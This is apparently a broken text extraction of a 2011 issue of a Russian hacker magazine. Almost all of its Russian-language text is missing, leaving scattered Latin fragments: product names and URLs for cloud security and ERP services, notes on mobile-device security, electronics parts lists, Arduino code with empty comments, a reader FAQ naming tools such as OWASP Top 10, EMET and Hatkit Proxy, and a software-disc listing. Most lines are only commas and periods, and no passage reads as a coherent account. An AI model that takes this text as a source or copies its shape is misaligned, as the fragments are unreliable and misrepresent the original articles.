SuccessFactors (successfactors.com).
,
, , .
Facebook LinkedIn (linkedin.com),
. LinkedIn
, 85 000 000
.
X 05 /148/ 2011
.
,
.
.
,
:). Dr.Web AV-Desk (drweb.com/saas/find_provider/
biz), Kaspersky Subscription Services (kaspersky.ru/kss),
Outpost AV Service (agnitum.ru/purchase/av-service)
ESET NOD32 (esetnod32.ru/.solutions/isp/list).
, , . Windows
. ,
. , Dr.Web x86 ,
, -,
,
. ,
, 2011, Kaspersky Internet Security 2011
Kaspersky CRYSTAL
.
,
.
,
, , , .
- McAfee, F-Secure
Panda web-
.
Panda Panda
Cloud Antivirus (cloudantivirus.com/ru),
.
, , ,
, .
INFO
info
CRM
][
04.2011.
119
SYN/ACK
Cisco WebEx
Panda Cloud Protection (cloudprotection.pandasecurity.com), Panda Cloud Office Protection, Panda Cloud
Email Protection Panda Cloud Internet Protection.
, -
. .
Panda Cloud Office Protection . , , , /IM HTTP/FTP-;
, IDS,
, HIPS. Panda Cloud
Antivirus. -, Panda Cloud Office Protection
. , . ,
, .
F-Secure Protection Service for
Business (f-secure.com/en_US/products/business/security-as-aservice/) McAfee SaaS Endpoint Protection (mcafeeasap.com/SC).
Cisco Webex
.
,
. , .
-, . Cisco,
2007 Webex, Cisco Webex
(webex.com), - . , Cisco Webex
50% . , ,
, , ,
(IM, , VoIP, ). , , , .
MS Office
.
iGoogle ,
,
.
120
Google Apps
Marketplace
, URL,
Meeting Center.
,
. : 640x360@30fps.
. , .
Webex
, -. (BlackBerry, Symbian, Windows Mobile Apple iOS).
, , ,
.
,
$49 ,
25 .
Cisco Webex Adobe Connect
(adobeconnect.ru), Microsoft Office Live Meeting (microsoft.com/online/
office-live-meeting.aspx), Skype .
Citrix GoToMeeting
(gotomeeting.com), 2004 . -,
( VoIP),
. ,
,
X 05 /148/ 2011
CRM NetSuite
.
GoToMeeting ( 15 ), GoToWebinar
( 1000 ) GoToMeeting
Corporate.
CRM ERP
,
CRM (Customer Relationship Management System,
). CRM ][ 04.2011.
,
, SaaS
. ,
, , . - (
), ,
. SSL. - ,
. , SaaS , .
Gartner SaaS,
CRM . ,
SaaS CRM . NetSuite CRM
(netsuite.com), SaleForce (salesforce.com) (megaplan.
ru). , NetSuite CRM 2009
Gartner -20 CRM- ,
SaleForce . SaaS, , CRM ,
.
SaaS
. , NetSuite CRM
: , ,
,
, ,
. CRM+
, , , ,
.
-, , , . CRM+
CMS, -,
CRM. , X 05 /148/ 2011
CRM.
smbXML (Small
Business Extensible Markup Language) -. NS-BOS,
, NetSuite.
, NetSuite ,
SaaS ERP ( (PSA), ), OneWorld (ERP
,
), OpenAir
myDIALS.
NetSuite, CRM,
,
-,
.
, CRM .
SaaS-, BigMachines
(bigmachines.com) .
BigMachines CRM- ERP-.
() . ,
, ,
, - . z
121
SYN/ACK
(polygaev@gmail.com, ICQ 284491726)
ERP -
-?
hardware- software- , . ,
, ,
.
, - , ERP-.
ERP: ERP- (. Enterprise Resource Planning System,
) ( ,
, - ).
(-)
. , ,
, ERP- .
ERP-,
.
, , ERP-
.
ERP
( -)
.
, .
:
-.
, ERP ,
ERP-. ,
- ( ) (,
-). ERP
- .
, ,
ERP-,
,
. , , , - N ERP-.
,
:
,
;
122
, ,
( );
: ( ), ( N M), ( N M);
- , ,
ERP,
, : ,
N
ERP-.
ERP: ,
( , , ERP ).
:
, , ,
;
ERP ;
,
ERP,
.
. ( ) 34,
. ,
80- ,
.
.
ERP .
. scope
,
-, .
- 1,
- SAP. ,
, , -,
,
. .
X 05 /148/ 2011
,
. Excel ,
-, . ,
ERP .
, ERP:
, ROI Return of Investment.
,
,
(
) ,
Unixoid ,
, -
, , .
, , ?
.
? :) ,
,
: lozovsky@glc.ru. , -
(http://group.xakep.ru) .
, .
, ,
.
,
, ,
.
CBA Cost-Benefits Analysis. .
, .
. .
1. , .
.
. .
2. , CBA
,
, .
,
, .
.
, ,
. , Microsoft Rapid Economic
(
- CBA-, REJ
,
/ -
X 05 /148/ 2011
123
SYN/ACK
, ERP
Justification (REJ).
:
1. -.
2. .
3. .
4. .
5. .
6.
.
Microsoft,
,
.
.
,
, ,
.
- , .
, , ,
. ERP -,
, . ,
.
. ,
. :
( , ),
,
- .
-
.
124
ERP
.
,
.
,
, ,
ERP.
, -,
,
,
. ,
-, , .
:
( ) N
ERP .
, Order processing.
(, -)
: , ERP-, ,
, ERP-.
, ERP-
. ,
:
-, ,
(, , ).
, :
ERP- ;
ERP- ,
(,
, ,
X 05 /148/ 2011
HTTP://WWW
links
ERP
: onsult.ru.
CBA:
http://goo.gl/7Bhn8.
Build an airtight
business case for new
IT investments:
http://goo.gl/UE08K;
Magic Quadrant
for Midmarket and
Tier 2-Oriented ERP
for Product-Centric
Companies:
gartner.com;
ERP 2009
,
);
ERP-
ERP- EDI (,
e-Cod).
. ,
, -,
,
.
ERP-,
, , :).
.
ERP-.
SAP.
-,
, ,
. SAP CRM.
ERP
long list .
,
X 05 /148/ 2011
ERP-.
:
. , ,
,
.
,
long list
. long list
( ,
). , long
list . ,
,
,
.
:
, ,
.
ERP-
2009 :
http://goo.gl/J57UC.
ERP .
long list,
.
ERP-.
excel-,
:
, , -
125
SYN/ACK
.
2-4 .
RFP Request for
Proposal ( ), . , , .
, , -
. short list.
short list
.
- ( Ca-Plus
Business solution)
.
, . ,
: ,
, ,
. -
( ,
), - (, , ).
ERP-.
long list,
.
.
, ,
ERP , /
.
:
1. ,
,
.
2.
,
. ,
,
, ,
.
3. ,
. -,
. ,
.
4. ,
, . .
long list short list
,
-
126
.
,
, ,
.
. , - , - .
, ,
, . , short list SaaS, ,
( , ),
, 5-7 .
,
.
. , .
,
.
. .
(,
, )
.
, ,
-
ERP-. :
;
;
;
ERP,
;
long list;
, short list;
;
;
.
,
. ,
. z
X 05 /148/ 2011
SYN/ACK
, , Group-IB
. ,
.
, .
, VPN, flash
java-script, , , .
,
.
BlackBerry,
, ,
.
, . Windows Mobile, Android, iOS, Symbian,
. ,
, .
, .
,
.
,
. ,
, .
1. .
,
,
, , .
2. -.
Skype, Icq, Jabber
,
, - .
3. , .
DropBox
- ,
.
, usb-,
.
,
, -. ,
.
4. .
.
X 05 /148/ 2011
5. .
VNC, TeamViewer
.
VPN.
, .
6. .
,
, sms-
. ,
.
.
-
,
.
, ,
. ,
.
, .
WindowsMobile
. 5.0 6. , -
. 6.0
. ,
.
. (Kaspersky
Endpoint Security for Smartphone, Dr.Web Enterprise Security Suite,
McAfee Mobile Security for Enterprise, Symantec Mobile Security
Suite for Windows Mobile, ESET NOD32 Mobile Security, GuardianEdge
Smartphone Protection).
,
, ,
127
SYN/ACK
2010 .
.
GuardianEdge DLP-.
ActiveSync Exchange Server
. Exchange Server
,
, - .
, ,
,
. .
Windows Phone 7 (WP7) , .
SymbianOS
Nokia WP7, Symbian
. Nokia
sis- . ,
. ,
. Java-
sis- ( , ), ,
,
, .
,
, Exchange ActiveSync (EAS) policies,
.
,
(Symantec Mobile Security for Symbian, Kaspersky Endpoint Security for
Smartphone, ESET NOD32 Mobile Security),
Windows Mobile .
,
installserver, .
,
, , , .
. Nokia ,
128
. 2-2,5 ,
.
iOS
Apple. (3gs
) . EAS,
Apple Push Notification
Service, .
Apple
Store .
(GuardianEdge Smartphone Protection, Panda Antivirus for Mac, Sophos
Mobile Control). Panda , iOS-, Mac.
Sophos , ( , 2011 . .). , Symbian,
- Jailbreaka.
iOS
.
Apple
.
AndroidOS
, Google,
. 1.6 Exchange Activesync,
. EAS (, ) . .
(McAfee WaveSecure,
Trend Micro Mobile Security for Android, Dr.Web Android, Kaspersky).
Android Market,
. Android , ,
,
(, X 05 /148/ 2011
Nielsen, ,
2011 . .
,
. .).
, , Symbian iOS, ,
root. root
. ,
.
, ,
, .
, , . -
, . ,
.
1. .
, . ,
.
( ),
.
2. .
,
, .
3. .
, .
, .
4.
.
,
. -. ,
.
X 05 /148/ 2011
5. , .
,
Windows Mobile ,
. , .
6. Exchange ActiveSync
, ,
( ),
.
7. .
,
( VPN, ),
( IPSEC,
).
/
, .
8. , .
.
, ,
, .
,
( ) ,
.
,
, Exchange-
EAS.
BlackBerry OS ( ), ,
. z
129
PHREAKING
(po@kumekay.com)
555
5 555
555
. -
, , 555
.
(555contest.com), .
: , , .
$1500.
,
555; ; ; , ; ,
.
, 555 ,
. ?
, ,
,
, . .
1. . ,
.
2. , .
(Vcc) , ,
, .
3. .
( ). 2
130
, , (
0,5 ), . ,
200 .
, .
4. . ( 0,7 ),
, .
, ,
(, ).
5. . , ,
. , ,
10 .
6. , . 2/3 Vcc,
.
, .
7. . ,
, ,
. 200
.
8. . . 4,5 16 .
9-, USB
X 05 /148/ 2011
1. .
,
,
. ,
, .
t=1,1*R1*C4.
,
, .
, C4=100 R1=2,2
4 .
:
0,000001 15 .
, .
2. .
3. .
- ,
, t1, ,
t2, . ,
ASCII-
: ____. ,
, RC- (
R2, R3 1) f = 1,44/((R3 + 2R2 )C1).
t1 = 0,693 (R3 + R2)C1
,
t2=0,693(R2)C1 .
.
,
.
, .
, ,
,
. ,
,
sureelectronics.net,
: .
, !
1: . ,
,
.
? -, 555 (
IC1). ,
DIP
. ,
. , ,
X 05 /148/ 2011
,
NE555N.
, 556 558,
2 4 .
,
. -, : C1 5
10 C3 10 .
: (LED1)
(R5) 300-600 ( 470 ),
, R1 1
C1
10
C2
100
C3
10
IC1
NE555
LED1
R1
R2
10
R5
470
S1
131
PHREAKING
R2 10 .
( ,
). C2 100 ,
.
(,
), ,
.
,
.
, .
C3,
, .
, ,
, , .
.
. ,
.
555
: ,
,
1
4, 5 8.
,
. ,
, , .
,
, .
,
,
, . , ,
.
.
.
, , .
,
,
USB-
, , .
,
.
,
( ), ,
:
USB,
, .
,
,
.
(, )
. ,
.
,
,
.
, ,
,
.
.
,
C4 ,
132
.
, 10 , ,
,
100 , .
.
( ) ,
4.
, ,
RC- . C1 100 , R2
1
R3 10 .
3 ,
,
.
R3.
, ,
.
.
X 05 /148/ 2011
.
555
. , ,
. ( )
//,
,
.
.
DealExtreme (s.dealextreme.com/
search/servo),
. ,
.
- :
, SERVO-3
, SERVO-1,
SERVO-2.
,
50
0,9 2,1 , ,
. RC-
,
.
,
,
D1. 1n4148,
,
.
.
555 , 15
, .
4,8 6 .
9 ,
. 7805,
5 . ,
. , ,
,
, . :
,
, ,
+5 .
,
,
.
C1
22
C2
100
C3
10
D1
1n4148
IC1
NE555
IC2
7805
R1
R2
56
R3
100
SERVO
C1
10
C2
100
C3
10
IC1
NE555
LED1
,
, : ,
, .
555.
X 05 /148/ 2011
,
.
,
R1
10
R2
10
R3
100
R4
R5
470
S1
T1
2N3904
133
PHREAKING
, R4 T1. ,
, , 200 ,
555, .
NPN- 2N3904, -
200 ,
, ,
- , IRF630,
9. ,
12 , .
,
3-6 ,
.
linux, ,
. ,
,
, . , ,
. :
,
!
555. (,
) 4
,
, .
IC2 . .
.
3 ,
LED2 (
, ,
134
).
S1, , 3 , LED1, ,
LED2 -, - ,
. ,
C4 R1.
6 2/3
Vcc, .
, R1
500 ,
.
, . instructables.com.
555
Timer Pro schematica.com/555_Timer_
design/555_Timer_PRO_EX.htm,
(,
$29, ,
). z
C1
10
C2
100
C3
10
C4
100
C5
10
IC1
NE555
IC2
NE555
LED1
LED2
R1
2.2
R2
10
R3
10
R4
470
R5
470
R6
10
S1
SP1
X 05 /148/ 2011
PHREAKING
(po@kumekay.com)
Arduino
,
, . , .
. , .
, . , ,
, , ,
, .
,
(, )
, ,
, .
. ,
,
, .
, .
:
1. ,
;
X 05 /148/ 2011
2. , ;
3. (
- , );
4. , , ,
;
5. , , .
.
: ,
- .
, ,
, 12
.
20 ,
. .
, .
,
. ,
135
PHREAKING
: , , .
8-10 60 ,
.
0,03 2 ( 0,2 ),
, ,
.
.
. -
, , 500 ,
. -
, , ,
. ( )
,
- , ! , ,
. , , (
) , 20-30
. ,
.
12 : , .
ATX . , ,
,
- (
), . ATX ,
20- ,
,
+12 , . ,
-
136
D1
1N4007
D2
1N4007
IC1
SS59E
IC2
SS59E
L1
Q1
- IRL530N
R1
10
R2
100
R3
10
T1
2N3904
U1
ARDUINO
, .
12- . , .
, , ,
, 1 . ,
.
npn-,
- . ( MOSFET) N-,
, . -
,
(
X 05 /148/ 2011
100 ). -
5 , ,
, . IRL530N
, 17 100 . , (, IR F630M),
12 .
, . 2N3904,
npn-.
: ,
, , - ,
.
,
( 1n4007) ,
, ,
,
. , , , , .
, .
( ) , - ,
, ,
. ,
X 05 /148/ 2011
,
,
. , ,
. , .
( ) (
) . , . , , ,
( )
.
. -
!
: ,
,
, ,
.
.
.
,
.
!
, ,
.
,
, 400-1000 .
137
PHREAKING
-
,
.
SS59E,
SOT223 ( ), , . to92 ( SS19,
SS49 SS495A). ,
. CD/DVD,
Bornimago http://s.dealextreme.com/search/magnets,
.
. . :
, , , ,
. .
.
, , . ,
,
,
.
,
.
. , ,
,
138
, , ,
.
Arduino, . Arduino Diecimila,
Duemilanove, Uno .
,
, ,
. ,
,
.
,
. D1
L1, D2
MO- Q1.
( ),
. IRL, Q1
R3 R2 D10 Arduino (
-). TO220 (
) : 1 (), ; 2 () , 3 ()
.
+12 .
Arduino - , 12- , ,
c
2,1 , 5,5 .
X 05 /148/ 2011
USB , .
. IC1 IC2 A0 1, VCC +5 , GND
. IC1 , IC2
( ,
-). .
10 ( ).
3 : +5 ,
A2.
- .
.
, , , , , . ,
, .
Arduino.
, , .
,
,
. , .
1
const int in1 = A0; // 1
const int in2 = A1; // 2
const int out1 = 10; // () .
int s1 = 0;
// 1
int s2 = 0;
// 2
int o1;
//
void setup() {
//
//Serial.begin(9600);
}
void loop() { //
//
analogWrite(out1, 255 ); //
//
delay(15); // ,
s1 = analogRead(in1); //
s2 = analogRead(in2); //
o1 = s2 -s1; //
Serial.print("magnet on: s1 = "); //
//
Serial.print( s1 );
Serial.print(" s2 = ");
Serial.print( s2 );
Serial.print(" delta = ");
Serial.print( o1 );
analogWrite(out1, 25 ); //
// , 10%
delay(15); // ,
s1 = analogRead(in1); //
s2 = analogRead(in2); //
o1 = s2 -s1; //
Serial.print("magnet off: s1 = "); //
//
Serial.print( s1 );
Serial.print(" s2 = ");
Serial.print( s2 );
Serial.print(" delta = ");
Serial.println( o1 ); //
delay(1000); //
}
X 05 /148/ 2011
,
( ).
,
- , . Arduino -.
(PWM, - )
, .
, , -
, ,
.
10% 100% .
, .
: , ,
( , ) . ,
,
,
, , . ,
, !
2
const int in1 = A0; // 1
const int in2 = A1; // 2
const int in3 = A2; //
const int d10 = < >;
// 10%
const int d100 = < >;
// 100%
const int out1 = 10; // () .
int
int
int
int
s1
s2
s3
o1
=
=
=
=
0; //
0; //
0; //
255;
// ,
//
int d = 0; //
int v;
//
void setup() {}
void loop()
{
s1 = analogRead(in1); //
s2 = analogRead(in2); //
//
d = map (o1, 25, 255, d10, d100); //
v = abs (s1- s2) +d ; //
o1 = map (v, 0, 1024, 25, 255); // ,
//
analogWrite(out1, o1); //
// .
delayMicroseconds(100); // ,
//
, , ,
.
, -
, , !
,
, .
! , zeltom.com/emls.aspx
. ! z
139
UNITS
Step (twitter.com/stepah)
faq
united?
faq@real.xakep.ru
Q:
. .
, ,
, : SQL
Injection, XSS . ,
?
A: ,
,
, OWASP Top
10 (owasp.org/index.php/OWASP_Top_Ten_
Project).
-.
:
A1: Injection;
A2: Cross-Site Scripting (XSS);
A3: Broken Authentication and Session
Management;
.
( )
.
,
140
, ,
: (bit.ly/
xakep_trainings). Mutillidae (bit.ly/Mutillidae).
OWASP Top 10.
,
. ,
.
XAMPP-. ,
.
Passive DNS query tool
(code.google.com/p/passive-dns-query-tool).
RubyGems:
gem install passive-dns
. ,
ISC
API-,
(
dnsdb@isc.org). DNSParse,
.
:
./pdnstool.rb <ip|domain|cidr>
Q: - , DNS
?
zdes_byla_malware.cc
DNS
?
A: ,
DNS:
DNSParse, ISC, BFK.de CERTEE.
Q: ,
.
?
A: LoadOrder (technet.microsoft.
com/ru-ru/sysinternals/bb897416). 2006 ,
.
X 05 /148/ 2011
LESS ,
Hatkit Proxy
DEP/ASLR
,
.
Q: -
, ,
,
?
A: .
, ,
,
. Java- (bit.ly/reveal_pass),
.
.
.
Q: , .
,
,
. !
,
100%
. .
?
A: ,
: .htaccess (
)
cgi-bin.
cgi-bin htdocs .
. ,
php.ini, :
auto_append_file = "/home/user/USER/
cgi-bin/security.cgi
X 05 /148/ 2011
PHP-
security.cgi, .
,
, .
Q: , DEP ASLR?
, , -,
,
,
- ?
A: Microsoft
EMET
Enhanced Mitigation Experience Toolkit (bit.ly/
EMETpage).
GUI-,
, DEP/ASLR, .
DEP, SEHOP,
ASLR, HeapSpray EAF. ,
( ) .
Q:
-
Python.
A: ,
web.py (webpy.org), cherry.py (cherrypy.
org), Django (djangoproject.com), Tipfy (tipfy.org)
Flask (flask.pocoo.org). ?
Flask,
-
:
from flask import Flask
app = Flask(__name__)
@app.route("/")
def hello():
return "Hello World!"
if __name__ == "__main__":
app.run()
:
$ easy_install Flask
$ python hello.py
* Running on http://localhost:5000/
, -
5000 .
web2py (web2py.com).
,
Python ( ), - SSL, SQLite,
, - (
web2py.
com/demo_admin/default/site).
,
,
. -
:
def index():
return "Hello World!"
Q: ,
?
A: tcpdump
Maemo,
Nokia N900. . ,
tcpdump Android. ,
Packet Sniffer (sites.google.com/
site/androidarts/packet-sniffer). ,
jailbreak, . ,
,
( Wi-Fi Bluetooth)
. iPhone , pirni (, ,
Cydia). ,
141
UNITS
. ,
, ,
Wireshark (wireshark.
org) .
Q: ,
.
?
A:
, , screenr.com. ,
. .
Windows,
Mac. , ,
API,
.
Q:
.
, .
?
A:
, , ,
. ,
,
.
.
Yahoo! YSlow (developer.yahoo.com/yslow).
Yahoo
Firefox,
Firebug. Yslow : ,
, -
Document
Object Model (DOM),
.
,
JavaScript-
Smush.It.
Web Page Test (webpagetest.org).
AOL ,
. Web Page Test
.
PageSpeed (code.google.com/speed/pagespeed).
, YSlow, -
142
Firefox/Firebug.
- Page
Speed
-
.
.
. <script>,
. ,
(,
),
,
. ,
,
, ,
.
2-3 .
, .
yepnope (yepnopejs.com).
Q: - CSS ? ,
, , ?
A:
, Sass (sass-lang.com)
LESS (lesscss.org). CSS , . ?
: , , ,
LESS, CSS,
.
LESS,
( @):
@the-border: 1px;
@base-color: #111;
#header {
color: @base-color * 3;
border-left: @the-border;
border-right: @the-border * 2;
}
#footer {
color: @base-color + #003300;
}
:
#header {
color: #333;
border-left: 1px;
border-right: 2px;
}
#footer {
color: #114411;
}
CSS .
Q:
Windows x64!
A: Windows 7 x64,
.
,
, virtdbg (code.google.
com/p/virtdbg).
,
Intel (VT-x), .
,
.
,
BSOD.
Q: ,
. ,
(
Foursquare),
. :).
A: , , .
.
, creepy (github.com/
ilektrojohn/creepy). ,
:
;
,
API;
EXIF- .
.
- .
Q:
,
MITM?
,
.
A: Hatkit Proxy
Project (bit.ly/hatkit). :
GUI-, TCP/
HTTP-;
MongoDB
;
HTTP- . z
X 05 /148/ 2011
>Security
Blazentoo 0.1b
BugChecker
Creepy 0.1.9
metasm
narly
Pyloris 3.2
quickrecon 0.2.3
radare2
RainbowCrack 1.5
Scapy 2.2.0
scdbg
>Net
BWMeter 5.4.1
DNSDataView 1.20
FirewallBuilder 4
inSSIDer 2.0.7
Internet Explorer 9
KpyM Telnet-SSH Server 1.19c
LAN Search Pro 9.0.1
NetSetMan 3.2.3
Odysseus 2.0.0.84
OTR localhost AIM proxy 0.3.1
RFIDIOt 1.0a
RogueScanner 2.6.0.0
SIP Inspector 1.31
Swish 0.4.6
TeamSpeak3 3.0.0
ThreatFactor 1.04
TightVNC 2.0.2
Tunngle 4.3.2.0
USB to Ethernet Connector 4.0
VodBurner 1.0.5
>Misc
1Password for Windows 1.0.5
Clavier+ 10.6.1
CodySafe
Launchy 2.6B2
OnTopReplica 3.3
Piles
Preme 0.941
Prey 0.5.3
Prio - Priority Saver 1.99
UltraSearch 1.4
ViGlance OneStep 2
winstack 0.80
>>WINDOWS
>Development
010Editor 3.1.3
CodeBlocks 10.05
Crack.NET v1.2
Diffuse 0.4.4
Enterprise Architect
HttpWatch Basic Edition 7.1.36
jQueryPad
LINQPad
Microsoft Web Platform Installer 2.0
Mockups for Desktop 2.0.19
OllyDbg 2.0.1 alpha 3
SmartAssembly 6.0
Visual Paradigm for UML 8.1 CE
Web Storm 2.0.1
>Devel
Apache Hive 0.7
Django 1.3
>>UNIX
>Desktop
Cardapio 1.0
CuneiForm 12
DjView4 4.7
DjVuLibre 3.5.24
FSV2 1.1.0
Geeqie 1.0
Glippy 0.2.2
Google Picasa 3.0.5744
Guake 0.4.2
LyX 2.0.0
MyTetra 1.28
Parcellite 1.0.1
Qmmp 0.5.0
Shotwell 0.9
Trimage 1.0.5
Webilder 0.6.9
YAGF 0.8.6
Zim 0.50
>Multimedia
AIMP v3.00 Beta 1
Fotobounce 3.2.1
FotoSketcher v2.00
Foxit Reader 4.3
Free Audio Editor 2011
Inkscape 0.48.1
MetatOGGer 4.0
Poladroid 0.9.6r0b
Sculptris Alpha 5
Similarity 1.5.4 beta
Songbird 1.9.3
Tableau Public
VLC 1.1.8
Zoner Photo Studio Free
>System
Auslogics Disk Defrag 3.2
BatteryCare 0.9.8
Beep Codes Viewer 0.4.7.462
DLL Archive 1.0.1
DOSBox 0.74
Double Driver 4.1
FileSeek 2.1.3
HashTab 4.0
LogLady 1.8
Open Hardware Monitor Version 0.2.1
Sikuli-X 1.0rc2
Soluto Beta
Splunk 4.2
SSD Tweak Utility 1.7
UNetbootin 5.49
VirtualBox 4.0.4
Watch 4 Folder 2.0
tinc 1.0.13
VERA 0.3
virtdbg
Visual DuxDebugger 2.0
Windows Credentials Editor v1.1
(WCE)
>Security
Arp scan 1.8
Chaosmap 1.3
Metasploit Framework 3.6.0
mitmproxy 0.4
Monocle Host Discovery Tool 1.0
Multi Threaded TCP Port Scanner 1.3
Packet Fence 2.1.0
QuickRecon 0.2.4
Social-Engineer Toolkit 1.3
sslsnoop 0.4
Subdomain Checker 0.1
t50 2.45
Tor 0.2.1.30
USBsploit 0.6
Wappalyzer 1.13.0
WhatWeb 0.4.7
yInjector
Creepy 0.1.9
Dradis v2.6.1
metasm
Radamsa v0.1.7
radare2
Scapy 2.2.0
sickfuzz 0.3
virtdbg
xsser 1.5.1
>>Net
aMule 2.2.6
EiskaltDC++ 2.2.1
Firefox 4.0
FreetuxTV 0.5.2
Gnash 0.8.9
Google Chrome 10.0.648.204
Hotot 0.9.9
inSSIDer 0.1
KTorrent 4.1
Midori 0.3.3
Minitube 1.4.1
Opera 11.01
Rekonq 0.7.0
Remmina 0.9.2
TrafficPanel 2.5
Transmission 2.22
Twitgin 0.3.0
Vacuum-IM 1.1.0
FriCAS 1.1.2
GCC 4.6.0
HTSQL 2.0.1
JRuby 1.6
Jython 2.5.2
Lazarus 0.9.30
Logisim 2.7.0
Matplotlib 1.0.1
Padre 0.84
PHP 5.3.6
Sqliteman 1.2.2
SWIG 2.0.3
TagLib 1.7
Violet UML Editor 0.21.1
wxPython 2.8.11.0
wxWidgets 2.8.12
>>MAC
Bean 2.4.3
Colloquy 2.3
DropCopy 1.71
Freemind 0.9.0
Juice 2.2
KisMac 0.3.3
MindNote 1.6
NovaBench 1.0
Nvu 1.0
OneButton FTP 1.0
Shiira 2.3
Skim 1.3.13
Sunrise 2.1.5
TextWrangler 3.5.3
Time Out 1.5.7
Tofu 2.0
Tomato Torrent 1.5.1
Xee 2.1.1
xPad 1.2.6
xTorrent 2.0
>X-distr
openSUSE 11.4
>System
AMD Catalyst 11.3
App Runner 0.4.9
Compiz 0.9.4
Fuse-exfat 0.9.4
GlassFish 3.1
GParted 0.8.0
Indicator-Virtualbox 1.1.1
Linux Kernel 2.6.38
Lucene 3.1
MultiSystem
nVidia 260.19.44
VirtualBox 4.0.4
Wine 1.3.17
Xen 4.1
Zfs-fuse 0.7.0
>Server
Apache 2.2.17
BIND 9.7.3
Dnsmasq 2.57
Dovecot 2.0.11
Drizzle 7 GA
HAproxy 1.4.14
LFTP 4.2.1
Monkeyd 0.13.2
MyDNS 1.1.0
nginx 0.9.6
ngIRCd 17.1
Openfire 3.7.0
OpenLDAP 2.4.25
OpenVPN 2.1.4
ProFTPD 1.3.3e
Samba 3.5.8
Squid 3.1.12
XMail 1.27
Games
Red Eclipse 1.0
05(148) 2011
: 2
10
.
5 DVD
. 82
. 68
MS08- 067:
WINDOWS
. 130
PHREAKING
Linux USB-
Red.Button:
Twitter
. 60
VOIP-
VOIP
05 (148) 2011
PWN2OWN:
UNITS
HTTP://WWW2
JavaScript-
CLOUD9
IDE
cloud9ide.com
GLIFFY
gliffy.com
-, JavaScript. :
Eclipse IDE Java C++, ,
- ,
.
,
JavaScript. Cloud9 IDE
,
watch , ,
GitHub.
- , UML-
, Microsoft Visio.
, Gliffy.
,
( ), , , ,
. , .
WUALA
wuala.com
CROCODOC
crocodoc.com
, Dropbox ( ,
), .
, .
? Wuala , Dropbox,
. , , / .
.
, , API- .
crocodoc :
( , PDF) . , ,
, .
. , , Word Acrobat.
144
X 05 /148/ 2011
90
.
210
:
PWN2OWN: . 82
05 (148) 2011
VOIP
5 DVD
VOIP-
. 60
PHREAKING
. 130
Linux USB-
Red.Button:
Twitter
MS08- 067:
WINDOWS
. 68
=90
www.xakep.ru/podpiska